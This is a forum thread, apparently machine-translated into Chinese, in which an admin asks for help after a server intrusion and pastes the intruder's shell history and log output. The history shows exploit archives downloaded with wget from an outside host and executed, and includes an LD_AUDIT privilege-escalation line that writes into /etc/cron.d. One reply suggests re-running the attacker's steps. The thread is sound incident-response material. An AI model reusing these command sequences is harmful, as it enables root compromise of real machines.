我查看了 netstat,发现除了我之外,还有人通过 ssh 连接到服务器。我注意到了这一点,因为我的用户只有一个 ssh 访问权限。我在 ftp 用户 .bash_history 文件中发现了这一点:
w
uname -a
ls -a
sudo su
wget qiss.ucoz.de/2010/.jpg
wget qiss.ucoz.de/2010.jpg
tar xzvf 2010.jpg
rm -rf 2010.jpg
cd 2010/
ls -a
./2010
./2010x64
./2.6.31
uname -a
ls -a
./2.6.37-rc2
python rh2010.py
cd ..
ls -a
rm -rf 2010/
ls -a
wget qiss.ucoz.de/ubuntu2010_2.jpg
tar xzvf ubuntu2010_2.jpg
rm -rf ubuntu2010_2.jpg
./ubuntu2010-2
./ubuntu2010-2
./ubuntu2010-2
cat /etc/issue
umask 0
dpkg -S /lib/libpcprofile.so
ls -l /lib/libpcprofile.so
LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ping
gcc
touch a.sh
nano a.sh
vi a.sh
vim
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
nano ubuntu10.sh
ls -a
rm -rf ubuntu10.sh . .. a.sh .cache ubuntu10.sh ubuntu2010-2
ls -a
wget qiss.ucoz.de/ubuntu10.sh
sh ubuntu10.sh
ls -a
rm -rf ubuntu10.sh
wget http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2Ksp3.exe
rm -rf W2Ksp3.exe
passwd
系统处于监狱状态。这与当前案件有关吗?我该怎么办?
谢谢大家!!
我已经完成了这些: - 使用 iptables 禁止连接的 ssh 主机 - 停止监狱中的 sshd - 保存:bach_history、syslog、dmesg、bash_history 的 wget 行中的文件
我还安装了 rkhunter 和 unhide。我运行了“unhide sys”命令,结果隐藏了 1 个进程。现在我正在运行 rkhunter... 好了。
rkhunter -c 导致一些警告:
在监狱中:检查是否允许 SSH 根访问 [警告] 检查 syslog 配置文件 [警告]
执行文件系统检查检查隐藏文件和目录 [警告]
主机系统:执行文件系统检查 检查 /dev 是否存在可疑文件类型 [警告] 检查隐藏文件和目录 [警告]
我在 dmesg 和 syslog 中发现黑客尝试了一些与 irda 有关的事情:
- 系统日志:
2月28日 22:48:41 i386 内核:[4180166.230061] irda_init() 2 月 28 日 22:48:41 i386 内核:[4180166.230077] NET:已注册协议系列 23 2 月 28 日 22:48:46 i386 内核:[4180171.242169] ioctl32(2.6.31:4726): /dev/pts/0 上未知 cmd fd(0) cmd(ffbb382c){t:'8';sz:16315} arg(00000001) 2 月 28 日 22:49:12 i386 sudo: pam_sm_authenticate: 已调用 2 月 28 日 22:49:12 i386 sudo: pam_sm_authenticate: 用户名 = [i] 2 月 28 日 22:49:12 i386 sudo:pam_sm_authenticate:/home/i 已挂载 2 月 28 日 22:49:33 i386 内核:[4180218.465341] can:控制器局域网核心 (rev 20090105 abi 8) 2 月 28 日 22:49:33 i386 内核:[4180218.465413] NET:已注册协议系列 29 2 月 28 日 22:49:33 i386 内核:[4180218.493398] can:广播管理器协议 (rev 20090105 t) 2 月 28 日 23:00:49 i386 内核:[4180894.035222] ip_tables:(C)2000-2006 Netfilter 核心团队 2 月 28 日 23:13:48 i386 sudo: pam_sm_authenticate: 已调用 2 月 28 日 23:13:48 i386 sudo: pam_sm_authenticate: 用户名 = [i] 2 月 28 日 23:13:48 i386 sudo:pam_sm_authenticate:/home/i 已挂载 2 月 28 日 23:17:01 i386 CRON[10126]: (root) CMD (cd / && run-parts --report /etc/cron.hourly) 2 月 28 日 23:36:29 i386 sudo: pam_sm_authenticate: 已调用 2 月 28 日 23:36:29 i386 sudo: pam_sm_authenticate: 用户名 = [i] 2 月 28 日 23:36:29 i386 sudo: pam_sm_authenticate: /home/i 已挂载
- dmesg:
[4180166.230061] irda_init() [4180166.230077] NET: 注册协议系列 23 [4180171.242169] ioctl32(2.6.31:4726):/dev/pts/0 上未知的 cmd fd(0)cmd(ffbb382c){t:'8';sz:16315} arg(00000001) [4180218.465341] can: 控制器局域网核心 (rev 20090105 abi 8) [4180218.465413] NET: 注册协议系列 29 [4180218.493398] can:广播管理器协议 (rev 20090105 t) [4180894.035222] ip_tables: (C) 2000-2006 Netfilter 核心团队
答案1
关闭你的系统,备份以备将来的取证分析,然后从头开始重建并从中恢复任何所需的数据已知良好备份。若不备份,则潜在的恶意代码可能会被利用。
答案2
您可以尝试复制黑客所做的事情,看看它是否能在某个时候成功(他是否设法将“漏洞”文件复制到 cron 脚本中?)。您可能想运行亨特检查您是否已植根,但它可能隐藏在其他地方。